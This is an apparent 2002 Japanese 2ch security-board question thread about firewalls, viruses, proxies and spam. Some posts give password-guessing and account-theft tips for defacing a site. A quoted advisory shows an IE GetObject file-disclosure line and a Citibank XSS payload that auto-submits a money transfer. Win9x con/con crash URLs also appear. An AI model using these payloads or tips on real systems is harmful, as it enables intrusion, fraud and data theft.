くだらねぇ質問はここに書き込め　Ver2.13

くだらない質問は新規でスレを立てたり
関係無いスレに書き込まずに　このスレに書いてください

前スレhttp://pc.2ch.net/test/read.cgi/sec/1002134745/l50

関連リンク >>2-10 >>11-20
各種ファイヤーウォール ログ解析ツール 日本語化パッチ
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報などは>>2
関連スレ・関連板は>>3
その他>>4-10
ずれていたら>>1-50参照

【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Sygate Personal Firewall http://www.sygate.com/
Tiny Personal Firewall http://www.tinysoftware.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer （Tiny Personal Firewall用）
http://server47.hypermart.net/tinyfirewall/
【日本語パッチ 等】
ZoneAlarm　Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH　MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

ウィルス情報はこの辺で得られます。
http://www.ipa.go.jp/security/index.html
http://www.symantec.com/region/jp/
http://www.trendmicro.co.jp/
http://www.nai.com/japan/

[過去スレ・関連スレッド・関連板]

part2.12 http://pc.2ch.net/test/read.cgi/sec/1002134745/l50

最強のファイアーウォールソフトって何かな？
http://pc.2ch.net/test/read.cgi/sec/988724444/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

ZoneAlarm　Part3 http://pc.2ch.net/test/read.cgi/sec/1006399748/l50
Tiny Personal Firewall Part2 http://pc.2ch.net/test/read.cgi/sec/1006423282/l50
＿■■BlackICEスレ■■＿ http://pc.2ch.net/test/read.cgi/sec/992171869/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50

ノートン Internet Security2002-Ver.3 http://pc.2ch.net/test/read.cgi/sec/1007036606/l50
ウイルスバスター2002 http://pc.2ch.net/test/read.cgi/sec/1002745629/l50
マカフィーってだめなの！PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

このウイルス何？ http://pc.2ch.net/test/read.cgi/sec/999636595/l50

パソコン初心者＠2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc.2ch.net/hack/
windows＠2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク　日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ

ネスケ（ネットスケープコミュニケータ）を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

■ 初心者用質問スレッド Part5 ■
http://pc.2ch.net/test/read.cgi/sec/1008322606/l50
○ネットセキュリティー板 質問、雑談スレッド[3]○
http://pc.2ch.net/test/read.cgi/sec/1006859839/l50
ファイアーウォールソフト 総合スレッド Part2
http://pc.2ch.net/test/read.cgi/sec/991646115/l50

>>1
お疲れちゃま。

>>3のノートンスレが終わったら
Norton Internet Security2002 Ver.4
http://pc.2ch.net/test/read.cgi/sec/1009681166/l50

>>3訂正
ウイルスバスター２００２ Part2 http://pc.2ch.net/test/read.cgi/sec/1009212569/l50

＞1さん
お疲れ様ー

くだらない質問です。

　ugtop によるぷろきし診断の時、元IPが表示されますよね。
　で、そのとき多段の時って、ugtop の仕様では、直前のIPを
表示する? それとも乗り継いだもともとの自分のPCのグローバル
IPが表示される仕様でしょうか?

あのー、ノートンパーソナルファイアウォール入れたんですが、
なんか変なのが外部とアクセスしてるようなんです。

C:\Windows\system\KRNL386.EXEがたびたび外部にアクセス試みて
るようです。

これってトロイとかいます??
不安です。

みなさん


あけましておめでとう。


ことしもよろしく。

なんか今日、やけにチョンが叩いてくるんですが

>>10

当たり自分で対処できないなら、フォーマットからやり直せ

>>13
ある意味、それもいい勉強だな

年が明けてから全然知らない人から全く心辺りのない件名で
添付ファイルメールが送られてきた…3通ほど。
なんか新しいウィルス流行ってるの？

該当するものが無かったので…

名無しで
AEMDMFAE.EXE
が添付されているメールが来ました
簡単なメーラーでメール確認したから大丈夫ですが、
捨てたほうがいいよね

>>16
さっさと捨てろ、このタコ！

勇気を持って開くＺＥ！

Addtron AWP-100
Bromax Freeport
Compaq WL100
D-Link DWL-650
GemTek (Taiwan) WL-211
Linksys WPC11
Samsung SWL2000-N
SMC 2632W
Z-Com XI300
Zoom Telephonics ZoomAir 4100
LeArtery Solutions SyncbyAir LN101

電大ハクられてるの？
ttp://www.ice.f.dendai.ac.jp

　

すげ〜〜くだらない質問だと思うけど、答えてオクレ。
IEでないエクスプローラー（ファイル管理用）でお気に入りからネットにつなぐのはヤバイ？。
IEと同じになる？。
IEにはグーグル検索窓つけてるんだけど、エクスプローラーからネットすると窓がない。
WindowsExplorerでネットして大丈夫なのかな？。
一応、今はネット接続禁止にしてるけど。

みんなの知ってる内でおしえてください、
homepage改ざんってよくあるけど、
鯖事態をハクorﾄﾞﾒｲﾝｼﾞｬｯｸ抜きで
user単位でのアカウントを奪う方法としてはどんな手段がありますか？
（ブルートフォース系抜き）
既にターゲットと同じ鯖の住人という条件としたら、、
普通のuserからパーミッションいじったりしたりするんですかね？

>>22　はぁ？

>>23
知ってどうする？逮捕されたいのなら教えてやる。

>>25
逮捕されたいです。
教えてください。

>>26　↓ここで聞け。

http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku1.htm

>>23
へぼいCGIのバグをつく。
そういう意味でヘボCGIは貴重な共有リソースなので大事にしよう。(W

前スレより
>>908
ノートンアンチウイルス起動するとZipRescueモードでは
動作しませんと出ます。これは何ですか？

セキュリティに関する質問です。
Win2K+Flets1.5Mを使用中だけど、
「この接続のアドレスをＤＮＳに登録する」 設定にするとコンピューター名は
誰にでも筒抜けなの？
Windowsのヘルプによれば、
「このフルコンピューター名を使って動的なＤＮＳ登録を試みる」との事。
この設定にしている間、ＳＵＮで使っていると思われるプロトコルの
インバウンドがしょっちゅう届く。（Port111, sunrpc, SUN Remote Procedure Call)
この設定をオフにしたらぴたりと止んだ。
ちなみに当方のコンピューター名だけ見ると、なんとなく X-Window 搭載機に
見えないこともない。（もう変えたけど）
だれかがＤＮＳで私のコンピューター名からＳＵＮのマシンと思って攻撃してきたの
だろうか？あるいは考えすぎ？
ＦＷで防いでるから実害はないけども、どなたか詳しい方、参考までにご教授乞う。

>>30
　可能性あると思います。
　SUN　はマシン多いすからぁねえ。。

　どなたか、9　のご教授お願いいたします(´Å｀;)

http://corn.2ch.net/test/read.cgi/entrance/1009896739/
↑このスレでwininits.exeってのがwindowsフォルダに入ってたらまずいって
読んで、念の為にって調べてみたらでてきちゃったんですけど、
どなたか、コイツについてわかりませんか？

↓ここにいったら感染するらしいです(私は別サイトで感染したみたいです）
ttp://popup.tok2.com/home/hachimitu/

↓googleでwininits.exeを検索かけたら2件ヒットしました。
http://www.google.com/search?q=%77%69%6E%69%6E%69%74%73&hl=ja&lr=&num=100

ttp://www.google.com/search?q=cache:I7a9ELEBcPM:calmen.cool.ne.jp/common/c_027.html+wininits&hl=ja
↑このひとの経験では、ログ、txt、アイコン等が消滅して、最後にはexe
dllとかまで消え出すらしく、ウイルス対策ソフトから隠れるトロイとのことなんだけど、
適切な対処法を御存知のかたいらっしゃたら教えていただけませんか？

トレンドマイクロ、シマンテックでwininits.exeを検索しても情報なしでした。
ちなみにトレンドマイクロのオンラインスキャンでは検出しませんでした。
困りはててます。。

>>32
フォーマットして最初から入れなおし。これ最強
＊＊＊＊＊終了＊＊＊＊＊＊

>>31
まずは>>9をまともな日本語にしてくれ。

>>33
そりゃそうだけど。いきなり最強ワザはちょっと・・・

>>35
これ以上かいても何も出てこないよ。あきらめろ去れ。

>>32
対処法。
フォーマット。
以上。

wininits.exeを削除しろよ。
まさか、そこまで頭の回らないｱﾌｫですか。

今日オフラインで仕事中に突然NISが反応して
「C:\WINDOWS\SYSTEM\KRNL386.exeがインターネットに
アクセスしようとしています」
と言ってきました。当然繋がりようもないんですが、
このようなメッセージは初めてのように思います。
で、念の為にNAVでスキャンをしようとしたら、今度は
IEのスクリプトエラーのメッセージが。
「このページのスクリプトでエラーが発生しました」
とのことでURLが
res://C:\PROGRAM%20FILES\NORTON%20ANTIVIRUS
\NAVUIDLL\scan.htm
と表示されます。未定義のエラーだとか。で、このページの
スクリプトを実行しつづけますか？の問いに「はい」「いいえ」の
いずれを答えてもスキャンを実行しません。
OSはWin98SE。NISとNAVは2002です。
いったい何が起きているのでしょうか。

ちなみにこの書き込みは別のPCから行っています。

>>39
対処法。
フォーマット。
以上。

>>39

低レベルな質問だな。
ノートンをアンインストールしろ。
そして今後一切ネットには接続しない。
これで解決。

>>39
KRNL386.exeで検索してから質問しなさい。

くだらない質問に、くだらない答え。
何か無駄だな。

>>43
禿げ同みんな消えろウザイ。解らないならネットやめろ

>>39
>>何がおこっているのでしょうか？

KRNL386.exeがインターネットにアクセスしようとしています

>>44
読めるか？(ﾜﾗ
http://www.google.com/search?hl=ja&q=krnl386.exe&btnG=Google+%8C%9F%8D%F5&lr=

>>46=39
お前はＡＮＤ検索もできんのか？（ワラ
そのものずばりの回答がこのスレの過去ログにあるんだよ

３９はキ・チ・ガ・イです。

http://www.google.com/search?hl=ja&q=krnl386.exe+%83E%83C%83%8B%83X&lr=lang_ja

５秒で判明です先生！もうこないでください>>39

３９市ね！

激しく勘違いだね〜。
私は39じゃないぞ〜。

>>30

NFS セキュリティホール Linux

で検索してみ

質問させていただきます。
私は今ヤフーのメッセンジャーをつかっているのですが、
噂で相手との対話内容が第三者に見られる可能性があると
きいたのですが、本当なのでしょうか。
もし、本当ならば、どうやって対処すればいいのでしょうか。
そして、もしよろしければ、どのようにそれをやっているのかを
大体でよろしいので、教えていただけないでしょうか。
この件に関して半信半疑なので。

どうぞよろしくおねがいいたします。

sunソラリスっていくらでうってますか？

IA-32版はタダ

>>53
Thanks for the response.
Linuxのfetchmailのオーバーフローを狙ってる、という事？
それにしても、オーバーフロー起因のセキュリティホールって
ずいぶんたくさんあるだね。

>>53
本当です。あなたの室内にビデオカメラが仕掛けられている可能性があります。
今すぐチェックしてください。

(　´_ゝ`)ﾌｰﾝ

ここの板って開くだけでトロイの木馬拾うスレッドがたくさん有るよ（ｺﾜ

>>59
マジで？

それとちょっと質問が・・2chでIP晒すとかなりヤバイんですか？
別スレで騒いでた人がいたみたいだけど・・。

>>59
そりゃ大変だ（w

>>60
初級のｳﾞｧｶ共の餌食になるかモナー

>>60
そんなことないかモナ〜
もうちょっとIPアドレスについて勉強しろヨナ〜

かんたんな作りのホームページの
いたずらのしかったってありますか？
ばかですいましぇん

>>63
いたずらってなんだ？　具体的に言え
犯罪に結びつくかもしれんから教えられんけど

友達のページに
ホームページみたら
画像が変わってたとか

>>65
やめてください。僕が63です。
いたずらというのはぜんぜんちがうページにしたいのです。

>>66
IDとパス盗めば済むことだろう。

ネタはsage、バカは初級でやってくれ

どうもすいません

新規スレを作ったら怒られちゃったのでここに書きます(笑)
サブアドを使って悪戯とかする人がいますよね。
誰が書いてるか発信元のアドレスって調べることってできるのかな？
調べる事ができたらいいんですけどね・・・
解かる人いたら教えてくださ〜い。

うその63の本物は俺
かってに謝るな>>68

>>60-62
名前欄にfusianasanと入れるとIPが晒せるよ

本物を名乗りたければトリップを使え
やり方は名前欄に
# & 適当な文字 を入力

ん？

どうやってぬすむんですか？

だから、ニセモノはやめてください。>>72-73

>>73
目で盗むんだよ。親方の仕事をじっと見てろ。

ページが簡単な作りでも、そのページのサーバが簡単な作りだとは限らないしな。

クラッキングは職人仕事なんですか？

>>75
親方はどうやって探すんですか？

>>78
ガテンでも買って探すんだな。
或いは、現場に直接行って飛び込みでお願いする。って手もあるが。
でもまあ、不景気だからねぇ。募集してるところに行ったほうがいい。

アルバイト
http://school.2ch.net/part/

就職
http://school.2ch.net/recruit/

転職
http://ton.2ch.net/job/

おねがいします

まちがえた。
おながいします。

誰か最新の串くれませんか？どれも使用出来なくなってて･･･探すのメンドーだし（＾＾;;;）
あと、Tellenet串って通常の串となにか違うんでしょうか？その判断って串ポートNOでわかるんでしょうか？

本物は私ですが、何か？

この串つかえ。
192.168.0.1:4545

>>83
あんたな。こんなとこで串くれって言って、
もらった串なんてロクなことないぞ。
特に「初心者」なんて名前を晒して募集したら。

串なんてな個人でどーにでも立てられるもんだし
串立てたヤツには串経由の送信筒抜けって分かってる？

>>85 のようにシャレで答えてくれるのはマシなほうだよ

初歩的な質問で申し訳ないのですが、同じ串を使ったら
ＩＤも一緒になるのでしょうか？

＞誰か最新の串くれませんか？どれも使用出来なくなってて･･･探すのメンドーだし（＾＾;;;）

この発言・・。

>>88
マゾ趣味があってﾘﾝｶｰﾝ希望なんでないの？

>>87
なる

>>87
もちろん日付や板が違ったら変わるYO！

これって開けない方がいいですか？　メールが戻ってきたようなんですが
クリップマーク付いてるので不安です。ここ６日程はケイタイでしか
やり取りしてないし、パソコンの人からはもう返事きてるし・・
リターン・メールってどれぐらい後から来るものでしょうか。
もし知ってる人のだと心配なので。（何回か普通のリターンメールはあります）

差出人　Ｍａｉｌ　Ｄｅｌｉｖｅｒｙ　Ｓｕｂｓｙｓ・・・（ここで切れてる）
件名　　Ｒｅｔｕｒｎｅｄ　Ｍａｉｌ　：　ｔｒａｎｓｃｒｉｐｔ　ｆｏｒ
　　　　ｄｅｔａｉｌｓ

>92
たぶんエラーメールだろうけど、本当は
メールのソースをみたら見当付くかも…

＞93
メールのソースを見ると言うのが情けない事にわかりません・・
もう削除したほうがいいのでしょうか

94です。すみません。今回はウィルスバスターが反応しませんでした。
見逃すこともあると聞いたので、どうしたらいいかと思って尋ねてみました。

>>95
さっさと開いてメールのヘッダ見なよ

これもあげとく

>>92
クリップマークとやらの中身は大抵自分が書いたメールだよ
ネットサービス系はCcやBCcで送ると受け付けないから普通に送ってみれ

127.0.0.1:8080

92です。
ウィルスとかでなく４日にケイタイへ送ったメールが戻ってきたものでした。
リターンメールでウィルスが送られてくるか検索してみたら
無いようでしたし、答えて下さった方の言葉もあったので見てみました。
お手数かけて申し訳ありませんでした。

IDとパスってどうやってぬすむんですか？

聞きたい期待

>>101
机に張ってあるのを見る
引き出しの中も見る
メモ帳も見る
ごみ箱からもあさる
ID＝社員コード・本名・ニックネーム・ハンドルネーム
PASS＝辞書アタック　または　個人情報から推測
例：
勤め先・学校名・住所・電話番号・名前＆生年月日・
家族の名前＆生年月日・結婚記念日・ペットの名前・
所有者の車種＆ナンバー・
などの英数文字列化 及び それらの組み合わせ。

思い当たる人はスグに改めましょうｗ

Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: [email protected]
Message-ID:< [email protected] >
Subject:It's time to STOP just making ends meet!!
----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email [email protected]
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to [email protected] ...Thanks
http://www.em5000.com/[email protected]
http://www.em5000.com/[email protected]
-----
mta05-svc.ntlworld.com
<<< 220 [email protected] ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 [email protected]
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 Sender <"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] > Ok
>>> RCPT TO:<[email protected]>
<<< 550 relaying mail to nanet.co.jp is not allowed

netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected]
<<< 501 unacceptable mail address

file:///c|/con/con
file:///c|/prn/prn
file:///c|/nul/nul
file:///c|/clock$/clock$
file:///c|/$MMXXXX0/$MMXXXX0

最近、メールのヘッダのfromもtoも我がメールアドレスになってる
エロサイトのDMが来ます。つまり宛先も差出人も一緒なわけです。
これって宛先人ごとにfromを変更してるんでしょうか？
そんな面倒なことって可能なんでしょうか？

>>106
専用ソフトがあるんじゃないか？

ウイルスに感染しているかもしれません。
どうやったら調べられますか？

>>107
一々設定すれば、あうとるくでも可能だけどねん。。
そんな面倒な事はしないで、めーらcgiアプして任せた方が楽ちんちんなのか。

何年か前にあった、少年４人によるハッカー事件を探しています。
ネット上でキーワードを入れて、何回も探したのですがヒットしません・・・。
ご協力をお願いします。

ＮＡＳＡのサーバかどこかに侵入して、国防総省→　軍　か、軍→国防総省

みたいなかんじで、ハックした少年４人がいたと思います。
１０代で、イギリス、イスラエル、などの国籍だったと思います。（３つか４の国です。）
１５歳の少年もいた気がします。

幸い、データなどをダウンロードしただけで核ミサイルなどには手をつけなかったようですが、
あわや　　という騒がれ方をしたと思います。


それでは、心当たりがありましたら宜しくお願いします。
では、失礼します。

２ｃｈ歴３ヶ月にして悟ったよ。

１．本当に困っているときに的確に答えてもらえる場合は少ない。
２．レベルが高い質問になるとその傾向がさらに強くなる。
３．板を隅から隅まで読むと大抵は知りたいことが書いてある（笑）

>>111
そもそも２ちゃんねるで質問をする事が間違ってるけどな
あんたが困ろうがこっちには関係ない事だし

>>112
たしかにそのとおりなんだが、それでいて、
>板を隅から隅まで読むと大抵は知りたいことが書いてある
というようにデータベースとして使えるのは、不思議ではあるね。
ある意味質問もまるっきり無駄ではないということか。

誰かの自己満足は
他の誰かの役にたつこともある
ということか

質問します。最近、クリックしてもいないのに、軍事版に飛んだり、
男性論女性論版に飛んだりする不可解な現象が頻繁に起きます。どうして
ですか？誰かが俺のコンピューターに侵入して操作しているんですか？
怖いです。

http://www7.ocn.ne.jp/~biba/top.htm

>>113
文字に浮かんで人格が出るんだよな。
長文になればなるほど。内容が深刻であればあるほど。

で、そのときに、どういうお願いの仕方をするか、によって
回答が得られるかどうかが決まっていると思うよ。見ていると。
丁寧に状況を説明して、具体的に、どうしたらよいか教えてほしい、
という質問の仕方の場合、よそでは受けられないレベルの
アドバイスが得られていることもあるし、人柄は大事だと思うよ。
たかが２ちゃんでもね。
あとは、運だよ。その知識を持っている人がたまたま見てくれないと、
回答得られないわけだし。

>>115
OSがWinとして答える
ウイルスチェックとスパイウエアチェックしてみろ
タスクトレイに変なアイコンは並んでないか？
スタートアップに変なソフトが登録されてないか？
おまえのPCに侵入したいというバカはいないから安心しろ

>>118
質問に答えてくださって、どうもありがとうございます。おっしゃるとおり、
OSはWindowsです。早速ウィルスとスパイウェアをチェックしてみます。
バカ丸出しな文面の質問で失礼しました。以後気を付けます。そして、
こんな質問に答えてくださった118さんに感謝します。

携帯電話の迷惑メールのことなんですが、
出会い系勧誘メールが頻繁に送られて来て、送信元は自分のメールアドレス
なんです。ためしに、返信したら自分に返ってくるんです。
業者が携帯の持ち主のアドレスで送信なんて出来るんでしょうか？
それから、なんとか受信したくないんですがご存知の方いらっしゃいませんか？
パソコンなどのウイルスのことじゃなくてごめんなさい。
でも大変困っています。

最近レスの名前の所(他の人がレスした)をクリックすると、
メール欄に自分の表示名のアドレスが載ってる事があります。
この前はパソコンに登録している知人のアドレスも載っていました。
第三者（まったく他人）の人がこのような事をするのは可能なのでしょうか？
あと、こう言う時はどう対処すれは良いですか?
詳しい方是非教えて下さい。

>>120
From欄をあなたのメールアドレスにしただけだろ
そんなのは業者じゃなくてもあなたでもできること

メールアドレスを頻繁に変える
ドコモ以外の携帯会社にする
PHSに乗り換える
携帯でメールはしない

どれでもいいぞ

>>121
それはJavaスクリプトが変に機能したんだったかな
それともウイルスのせいだったかな

とりあえずウイルスチェックをしな
あとスパイウエアチェックも

質問させていただきます…
outlook expressのプレビューのみで感染するタイプのウィルス
だと思われるのですが､プレビューした途端にmedia playerが
起動しました。全然知らない方からのメールで､件名は｢Re:｣で､
添付されていたファイル名は｢ATT00029.txt｣でした…。

チェックしようにもどのようなウィルスに感染したのか
全く分からなくて困ってます。
分かる方がいたら教えていただきたいです。

>>124
それはバッドトランスじゃねえのか
そもそもスキャンソフト持ってないのに感染したのか分からないのは当たり前
今日は回線切って寝ろ
明日ウイルス対策ソフトを買ってこい

すみません。すでに出ていたらもっとすみません。
友人がNorton Internet Security2002
を作動させたら、メール、アドレス帖が全て消えたって
言ってるんですがそんなことありますか？ ？？？

スゴイな、Norton Internet Security2002。
セキュリティのために削除…最強だよ。

>>126
マルチ去れ　クズ

ウイルス対策は「ウイルスバスター２００２」だけ買えばいいんでしょうか？
ノートンの場合、「アンチウイルス」とか「パーソナルファイアーウォール」とか、
いろいろあるんですが・・・

未だにウイルスバスター９８を使っていますが
検索機能的には問題ないでしょうか？
定義ファイルはトレンドマイクロから最新の物を落としています。

>>129
マルチ去れ　クズ

>>130
定義ファイルがちゃんと機能すれば問題ないと思われ
でもトレンドマイクロからの製品自体のサポートは切れてると思うぞ
最新版にしてくれって案内が来ただろ？

>>131
氏ね

>>131
どうも。UB2001は重いのとモデムとの相性が悪いので消したんです

今日　何かあった？
新種のウィルスとか

>>134
あったよ

ＷＩＮＤＯＷＳ￥ＣＯＯＫＩＥＳ
の中に「index.dat」ってファイルがあるんですけど
これって何ですか？

>>136
開いてみれば分かるがクッキーの中身

>>137
冷害が発生しました。

>>138
霜ネタか？

フラッシュで感染するウィルスか
恐いね

かえっていいよ

スパイブロッカーがサーバーとして動作しようとするけど何のためにそんなことするかわからん。
知ってる人いる？

ttp://www.geocities.co.jp/help/board/Messages/321420.html
これはなんの目的なのかわかる方いませんか？

>>142
世の中にゃこんなヤツ掃いて捨てるほど居るヨ。
係わったって損することはあっても得はない。

sageながら実はageてたよ…馬鹿だね。てへ。
逝ってきます。

143さんレスありがとう。
HOTMAILでサーチされる（の？ホント？）のにウィルスは
欲しいから送ってくれって、たった１行で矛盾しているあたり
やっぱり頭がオカシイのかな。Geoはお子様が多いから、
メールしちゃう子ちゃんがいないかチョット心配です。
自治会（常連回答者さんたち）がどう反応するか少し期待。

ファイアーウォールソフトをインストールしたんだけど
確認したいので自分のパソコンにポートスキャンしてみたいんですけど
どうやればいいんですか？

ＰＣが立ち上がらなくて困っています。

最初の一度だけ立ち上がったのですが、デスクトップのショートカットが全て作動しないので
スタートボタンからネットに繋いでみようとしてみるとフリーズしました。
強制終了してもう一度立ち上げてみると、アクティブデスクトップメニューのエラーが出ました。
修復を選んでも修復されず、応答なし状態に･･･。

最近のイベントとしては
１．一月半ごろ前にトロイを発見、駆除。ダイヤルアップを書き換えるタイプです。
２．一昨日と昨日にノートン先生がポートスキャン、トロイのバックドアーへのアクセスを遮断。
３．ＩＮＳ2002で全スキャンするもウィルスは発見できず。
４．ＩＥとＯＥをやめ、ネスケとＥｕｄｏｒａをインストール。
５．添付ファイル付きなどの怪しいメールは届いてません。

昨日まで普通に使用していたのですが、今日朝立ち上げてみると冒頭のような状態になっていました。
どなたかこの状況から抜け出す方法をご存知の方いらっしゃいませんか?助けて下さい。
ＯＳ再インストールしかないのでしょうか･･･?

ちなみにＯＳはウィンドウズＭｅです（ｗ

>>146
別のPCからPING打ってみれば？

>>147
さっさとOS再インストール
それが一番確実で簡単

>>148
ＰＣは２台もってるんだけど２台同時にネットにつなぎ方がわからないし
ＰＩＮＧってどうやるのかわからないので教えてください。
どこかのサイトでポートスキャンのサービスがあるってきいてやってみたんですけど
英語ばかりで意味がわからなかったので日本語サイトでそういうのがあったら教えて欲しいです。

>>149
「２ちゃんねる」というところがあります。
IPアドレスを書き込めば、ポートスキャンだけでなく、
いろいろなパターンで試行してくれるので、
サーバの脆弱性の確認には最適かと思います。

>>149
別にネットに繋がなくてもいいだろ
PCどうしをクロスで繋げろ
pingはDOSから打て

>>150
それイイ！！ψ(｀∇´)ψ

あほっ！

素人で全くもって申し訳ございませんが、自分のPCが覗かれているかどうかを確認できる方法・ツールなど（素人でもわかる）あればどなたかアドバイス下さい。

>>154
のーとんいんたーねっとせきょりてぃ

>>154
NO hacker! でどうだ。

質問。和レモンの野ー豚とか安置って定義更新しちゃったらばれちゃうの？
ＭＸとかでよく出回ってるけど使えるの？

>>157
どうしても必要なら買え。

この手の質問を考えつく奴の頭が理解出来ん。
どう考えたらそんな質問が出てくるのか。理不尽極まりない。
後、質問はageで。

そりゃ失礼

Microsoft Internet Explorer GetObject File Disclosure Vulnerability
BugTraq ID: 3767
リモートからの再現性: あり
公表日: Jan 01 2002 12:00A
関連するURL:
http://www.securityfocus.com/bid/3767
まとめ:

Microsoft Internet Explorer には、リモートの攻撃者が攻撃対象のコンピュー
タ内に存在する既知のファイルを、このソフトウェアの利用者が特別に組み立
てられたスクリプトを含む Web コンテンツを参照する際、閲覧できてしまう問
題が推察されている。

JScript の関数、GetObject() が ActiveX object 'htmlfile' と組み合わせて
利用される際に問題は発生する。この際、../ を含む URL が関数の最初の引数
として渡された場合、Microsoft Internet Explorer は生成された HTML 文書
オブジェクトの DOM に対し、どの様なアクセスであっても許可されてしまうの
である。

例:
a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

この問題により、悪意ある Web サイトの管理者による、攻撃対象のコンピュー
タ内に存在するいかなるファイルに対する内容の入手が可能になってしまうの
である。なお、この問題は任意のコードの実行も可能にすると推察される。

未解決！シティバンクのオンラインサイトにクロスサイトスクリプティング問題
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html

https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
--
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='[email protected]';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html

>>159
（・∀・）ｶｺﾜﾙｲ!
つーかね＾、道端に落っこちてるコンドームを拾って
再利用するよーなもんですよ？

>>162を簡単にすると、

勝手に拾った以上、黴菌や性病が移っても自己責任．

ところで自分でハッカーだ、お前のＰＣ壊せるぞーとか
言ってるヤツにホントにｽｰﾊﾟｰﾊｶｰっているのかな？
ココ最近、そういう方に良く合うんだけど…世も末ッス…

しょーもない質問なのでsage

　ＮＩＳが和塩のジオ・カウンターを遮断するんですが
何故なんでしょうか？なんかヤバイんですか？？

こんな感じです
　　↓
遮断 した参照元: http://www.geocities.co.jp/*****-***/****/*****.html､
送信先は http://tools.geocities.co.jp/*****-***/****/@geocounter

すみません、　hを削るのと、ageるの忘れてました。

昨夜からWindowsUpdateができない状態なんですが、みなさんのところではいかがですか？
3台のPCで試してみたんですが、どれもダウンロードが全然できなくて不明なエラー
になってしまいます

>>167
不明なエラーの為ＤＬ出来ませんでした。
・・・となりました、なんで？？？

167 です
ダウンロードを開始するところまでは行くのですが
まったく落ちてこずに以下のエラーになります

不明なエラーのためインストールできませんでした。 (-2147012889)

>>164
やぱり、ｽｰﾊﾟｰﾊｶｰは
知らない間に来て知らない間に仕事して知らない間に去ってゆく
もんでそ？　そういうことが出来ないから吼えるアホーがいるわけで…

>>167
鯖が氏んでるみたいだよ
http://pc.2ch.net/test/read.cgi/win/1003992632/l50

みたいですね
知人のPCをセットアップしているんですが
Windows2000SPはCDがあるからいいけど、IEのアップデート、
セキュリティパッチがあてられないのが困るなぁ
だから雑誌CDで提供しろって＞MS

>>172
パッチはあててもすぐにやぶられるからコストが割にあわないんでしょ

>>164
自分から言うやつも中にはいるだろうけど、
わざわざ自分の身を危険に晒すバカはいないだろう。
とりあえず、「スーパー」がつくほどハカーなら、
そんな事は言いません。

ノートン　アンチウイルスの　オートプロテクトが有効になるのに　３分くらいかかる。
なんでじゃ？

>>175
なんでじゃろ。（ｗ

